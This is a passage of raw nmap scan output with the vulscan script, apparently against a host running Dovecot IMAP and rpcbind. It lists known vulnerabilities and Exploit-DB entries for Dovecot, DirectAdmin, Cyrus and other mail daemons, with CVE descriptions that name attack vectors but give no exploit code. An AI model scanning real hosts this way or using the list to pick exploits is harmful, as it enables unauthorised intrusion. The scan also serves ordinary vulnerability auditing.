| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
| [23254] DirectAdmin Logfile HTML Injection Vulnerability
| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
| [17961] Dovecot Remote Information Disclosure Vulnerability
| [16672] Dovecot Double Free Denial of Service Vulnerability
| [8495] akpop3d User Name SQL Injection Vulnerability
| [8473] Vpop3d Remote Denial Of Service Vulnerability
| [3990] ZPop3D Bad Login Logging Failure Vulnerability
| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [86382] Dovecot POP3 Service denial of service
| [85490] DirectAdmin Backup System email account functionality symlink
| [85488] DirectAdmin Backup System symlink
| [84396] Dovecot IMAP APPEND denial of service
| [80453] Dovecot mail-search.c denial of service
| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
| [72685] DirectAdmin domain parameter cross-site request forgery
| [71354] Dovecot SSL Common Name (CN) weak security
| [67675] Dovecot script-login security bypass
| [67674] Dovecot script-login directory traversal
| [67589] Dovecot header name denial of service
| [67254] DirectAdmin MySQL information disclosure
| [67253] DirectAdmin hard link privilege escalation
| [63267] Apple Mac OS X Dovecot information disclosure
| [62340] Dovecot mailbox security bypass
| [62339] Dovecot IMAP or POP3 denial of service
| [62256] Dovecot mailbox security bypass
| [62255] Dovecot ACL entry security bypass
| [60639] Dovecot ACL plugin weak security
| [57267] Apple Mac OS X Dovecot Kerberos security bypass
| [56875] DirectAdmin name cross-site scripting
| [56763] Dovecot header denial of service
| [55181] DirectAdmin account cross-site request forgery
| [54363] Dovecot base_dir privilege escalation
| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
| [50167] DirectAdmin CMD_DB command execution
| [49416] DirectAdmin CMD_DB backup action symlink
| [46323] Dovecot dovecot.conf information disclosure
| [46227] Dovecot message parsing denial of service
| [45669] Dovecot ACL mailbox security bypass
| [45667] Dovecot ACL plugin rights security bypass
| [41085] Dovecot TAB characters authentication bypass
| [41009] Dovecot mail_extra_groups option unauthorized access
| [39342] Dovecot LDAP auth cache configuration security bypass
| [36510] DirectAdmin user parameter cross-site scripting
| [35767] Dovecot ACL plugin security bypass
| [35177] DirectAdmin domain parameter cross-site scripting
| [34082] Dovecot mbox-storage.c directory traversal
| [33390] DirectAdmin log file cross-site scripting
| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
| [26578] Cyrus IMAP pop3d buffer overflow
| [26536] Dovecot IMAP LIST information disclosure
| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
| [24709] Dovecot APPEND command denial of service
| [13018] akpop3d authentication code SQL injection
| [7345] Slackware Linux imapd and ipop3d core dump
| [6269] imap, ipop2d and ipop3d buffer overflows
| [5923] Linuxconf vpop3d symbolic link
| [4918] IPOP3D, Buffer overflow attack
| [1560] IPOP3D, user login successful
| [1559] IPOP3D user login to remote host successful
| [1525] IPOP3D, user logout
| [1524] IPOP3D, user auto-logout
| [1523] IPOP3D, user login failure
| [1522] IPOP3D, brute force attack
| [1521] IPOP3D, user kiss of death logout
| [418] pop3d mktemp creates insecure temporary files
|
| Exploit-DB - https://www.exploit-db.com:
| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
| [23053] Vpop3d Remote Denial of Service Vulnerability
| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
| [11893] tPop3d 1.5.3 DoS
| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
|
| OpenVAS (Nessus) - http://www.openvas.org:
| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
| [901025] Dovecot Version Detection
| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
| [870607] RedHat Update for dovecot RHSA-2011:0600-01
| [870471] RedHat Update for dovecot RHSA-2011:1187-01
| [870153] RedHat Update for dovecot RHSA-2008:0297-02
| [863272] Fedora Update for dovecot FEDORA-2011-7612
| [863115] Fedora Update for dovecot FEDORA-2011-7258
| [861525] Fedora Update for dovecot FEDORA-2007-664
| [861394] Fedora Update for dovecot FEDORA-2007-493
| [861333] Fedora Update for dovecot FEDORA-2007-1485
| [860845] Fedora Update for dovecot FEDORA-2008-9202
| [860663] Fedora Update for dovecot FEDORA-2008-2475
| [860169] Fedora Update for dovecot FEDORA-2008-2464
| [860089] Fedora Update for dovecot FEDORA-2008-9232
| [840950] Ubuntu Update for dovecot USN-1295-1
| [840668] Ubuntu Update for dovecot USN-1143-1
| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
| [70259] FreeBSD Ports: dovecot
| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
| [66522] FreeBSD Ports: dovecot
| [65010] Ubuntu USN-838-1 (dovecot)
| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
| [62854] FreeBSD Ports: dovecot-managesieve
| [61916] FreeBSD Ports: dovecot
| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
| [60528] FreeBSD Ports: dovecot
| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
| [60089] FreeBSD Ports: dovecot
| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
|
| SecurityTracker - https://www.securitytracker.com:
| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
|
| OSVDB - http://www.osvdb.org:
| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
| [66113] Dovecot Mail Root Directory Creation Permission Weakness
| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
| [66110] Dovecot Multiple Unspecified Buffer Overflows
| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
| [64783] Dovecot E-mail Message Header Unspecified DoS
| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
| [62796] Dovecot mbox Format Email Header Handling DoS
| [61395] DirectAdmin Admin Account Creation CSRF
| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
| [43137] Dovecot mail_extra_groups Symlink File Manipulation
| [42979] Dovecot passdbs Argument Injection Authentication Bypass
| [39876] Dovecot LDAP Auth Cache Security Bypass
| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
11392| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
11393| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
11394| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
11395| [32673] DirectAdmin CMD_TICKET type Parameter XSS
11396| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
11397| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
11398| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
11399| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
11400| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
11401| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
11402| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
11403| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
11404| [23281] Dovecot imap/pop3-login dovecot-auth DoS
11405| [23280] Dovecot Malformed APPEND Command DoS
11406| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
11407| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
11408| [5857] Linux pop3d Arbitrary Mail File Access
11409| [2471] akpop3d username SQL Injection
11410|_
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
11412| rpcinfo:
11413| program version port/proto service
11414| 100000 2,3,4 111/tcp rpcbind
11415|_ 100000 2,3,4 111/udp rpcbind
143/tcp open imap syn-ack Dovecot imapd
11417| vulscan: VulDB - https://vuldb.com:
11418| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
11419| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
11420| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
11421| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
11422| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
11423| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
11424| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
11425| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
11426| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
11427| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
11428| [69835] Dovecot 2.2.0/2.2.1 denial of service
11429| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
11430| [65684] Dovecot up to 2.2.6 unknown vulnerability
11431| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
11432| [63692] Dovecot up to 2.0.15 spoofing
11433| [7062] Dovecot 2.1.10 mail-search.c denial of service
11434| [59792] Cyrus IMAPd 2.4.11 weak authentication
11435| [57517] Dovecot up to 2.0.12 Login directory traversal
11436| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
11437| [57515] Dovecot up to 2.0.12 Crash denial of service
11438| [54944] Dovecot up to 1.2.14 denial of service
11439| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
11440| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
11441| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
11442| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
11443| [53277] Dovecot up to 1.2.10 denial of service
11444| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
11445| [45256] Dovecot up to 1.1.5 directory traversal
11446| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
11447| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11448| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11449| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
11450| [40356] Dovecot 1.0.9 Cache unknown vulnerability
11451| [38222] Dovecot 1.0.2 directory traversal
11452| [37927] Ipswitch Ipswitch Collaboration Suite up to 2006.1 IMAP Service imapd32.exe memory corruption
11453| [36376] Dovecot up to 1.0.x directory traversal
11454| [35759] Atrium MERCUR IMAPD IMAP4 mcrimap4.exe memory corruption
11455| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
11456| [30337] Cyrus IMAPD 2.3.2 Stack-based memory corruption
11457| [30268] Timo Sirainen Dovecot 1.0/1.0 Beta2/1.0 Beta3/1.0 Beta7 directory traversal
11458|
11459| MITRE CVE - https://cve.mitre.org:
11460| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
11461| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
11462| [CVE-2011-3481] The index_get_ids function in index.c in imapd in Cyrus IMAP Server before 2.4.11, when server-side threading is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted References header in an e-mail message.
11463| [CVE-2011-3372] imap/nntpd.c in the NNTP server (nntpd) for Cyrus IMAPd 2.4.x before 2.4.12 allows remote attackers to bypass authentication by sending an AUTHINFO USER command without sending an additional AUTHINFO PASS command.
11464| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
11465| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
11466| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
11467| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
11468| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
11469| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
11470| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
11471| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
11472| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
11473| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
11474| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
11475| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
11476| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
11477| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
11478| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
11479| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
11480| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
11481| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
11482| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
11483| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
11484| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
11485| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
11486| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
11487| [CVE-2007-5740] The format string protection mechanism in IMAPD for Perdition Mail Retrieval Proxy 1.17 and earlier allows remote attackers to execute arbitrary code via an IMAP tag with a null byte followed by a format string specifier, which is not counted by the mechanism.
11488| [CVE-2007-5018] Stack-based buffer overflow in IMAPD in Mercury/32 4.52 allows remote authenticated users to execute arbitrary code via a long argument in a SEARCH ON command. NOTE: this issue might overlap with CVE-2004-1211.
11489| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
11490| [CVE-2007-3925] Multiple buffer overflows in the IMAP service (imapd32.exe) in Ipswitch IMail Server 2006 before 2006.21 allow remote authenticated users to execute arbitrary code via the (1) Search or (2) Search Charset command.
11491| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
11492| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
11493| [CVE-2007-1579] Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.
11494| [CVE-2007-1578] Multiple integer signedness errors in the NTLM implementation in Atrium MERCUR IMAPD (mcrimap4.exe) 5.00.14, with SP4, allow remote attackers to execute arbitrary code via a long NTLMSSP argument that triggers a stack-based buffer overflow.
11495| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
11496| [CVE-2006-6762] The IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to cause a denial of service via an APPEND command with a single "(" (parenthesis) in the argument.
11497| [CVE-2006-6761] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via a long argument to the SUBSCRIBE command.
11498| [CVE-2006-6425] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via unspecified vectors involving the APPEND command.
11499| [CVE-2006-6424] Multiple buffer overflows in Novell NetMail before 3.52e FTF2 allow remote attackers to execute arbitrary code (1) by appending literals to certain IMAP verbs when specifying command continuation requests to IMAPD, resulting in a heap overflow
11500| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
11501| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
11502| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
11503| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
11504| [CVE-2005-2278] Stack-based buffer overflow in the IMAP daemon (imapd) in MailEnable Professional 1.54 allows remote authenticated users to execute arbitrary code via the status command with a long mailbox name.
11505| [CVE-2005-1256] Stack-based buffer overflow in the IMAP daemon (IMAPD32.EXE) in IMail 8.13 in Ipswitch Collaboration Suite (ICS), and other versions before IMail Server 8.2 Hotfix 2, allows remote authenticated users to execute arbitrary code via a STATUS command with a long mailbox name.
11506| [CVE-2005-1249] The IMAP daemon (IMAPD32.EXE) in Ipswitch Collaboration Suite (ICS) allows remote attackers to cause a denial of service (CPU consumption) via an LSUB command with a large number of null characters, which causes an infinite loop.
11507| [CVE-2005-1015] Buffer overflow in MailEnable Imapd (MEIMAP.exe) allows remote attackers to execute arbitrary code via a long LOGIN command.
11508| [CVE-2005-0546] Multiple buffer overflows in Cyrus IMAPd before 2.2.11 may allow attackers to execute arbitrary code via (1) an off-by-one error in the imapd annotate extension, (2) an off-by-one error in "cached header handling," (3) a stack-based buffer overflow in fetchnews, or (4) a stack-based buffer overflow in imapd.
11509| [CVE-2003-1322] Multiple stack-based buffer overflows in Atrium MERCUR IMAPD in MERCUR Mailserver before 4.2.15.0 allow remote attackers to execute arbitrary code via a long (1) EXAMINE, (2) DELETE, (3) SUBSCRIBE, (4) RENAME, (5) UNSUBSCRIBE, (6) LIST, (7) LSUB, (8) STATUS, (9) LOGIN, (10) CREATE, or (11) SELECT command.
11510| [CVE-2002-1782] The default configuration of University of Washington IMAP daemon (wu-imapd), when running on a system that does not allow shell access, allows a local user with a valid IMAP account to read arbitrary files as that user.
11511| [CVE-2002-1604] Multiple buffer overflows in HP Tru64 UNIX allow local and possibly remote attackers to execute arbitrary code via a long NLSPATH environment variable to (1) csh, (2) dtsession, (3) dxsysinfo, (4) imapd, (5) inc, (6) uucp, (7) uux, (8) rdist, or (9) deliver.
11512| [CVE-2002-0997] Buffer overflows in IMAP Agent (imapd) for Novell NetMail (NIMS) 3.0.3 before 3.0.3A allows remote attackers to cause a denial of service.
11513| [CVE-2002-0379] Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.
11514| [CVE-2001-0691] Buffer overflows in Washington University imapd 2000a through 2000c could allow local users without shell access to execute code as themselves in certain configurations.
11515| [CVE-2000-0284] Buffer overflow in University of Washington imapd version 4.7 allows users with a valid account to execute commands via LIST or other commands.
11516| [CVE-1999-1557] Buffer overflow in the login functions in IMAP server (imapd) in Ipswitch IMail 5.0 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long user name or (2) a long password.
11517| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
